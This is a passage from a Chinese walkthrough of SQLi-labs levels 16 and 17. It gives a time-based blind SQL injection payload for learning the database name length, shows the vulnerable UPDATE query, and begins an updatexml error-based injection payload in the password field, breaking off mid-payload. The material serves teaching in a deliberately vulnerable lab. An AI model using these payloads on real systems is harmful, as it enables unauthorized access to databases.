Less16
代码分析
判断数据库长度payload:
admin") and If(length(database())=8,1,sleep(5))#
这一关在参数闭合上与15关有些区别,只需将上一关的’改成")
增删改查函数链接的第二十章
Less17
代码分析
上述代码执行的sql语句
UPDATE users SET password = '$passwd' WHERE username='$row1'; #row1是查询到的username
#此关中username变量是查询数据库后再被赋值给变量row1,不能在此进行注入
#我们可以使用可控参数passwd进行sql报错注入
1.利用XPATH报错注入查询数据库名和用户名
username: admin
password: admin' and updatexml(1,concat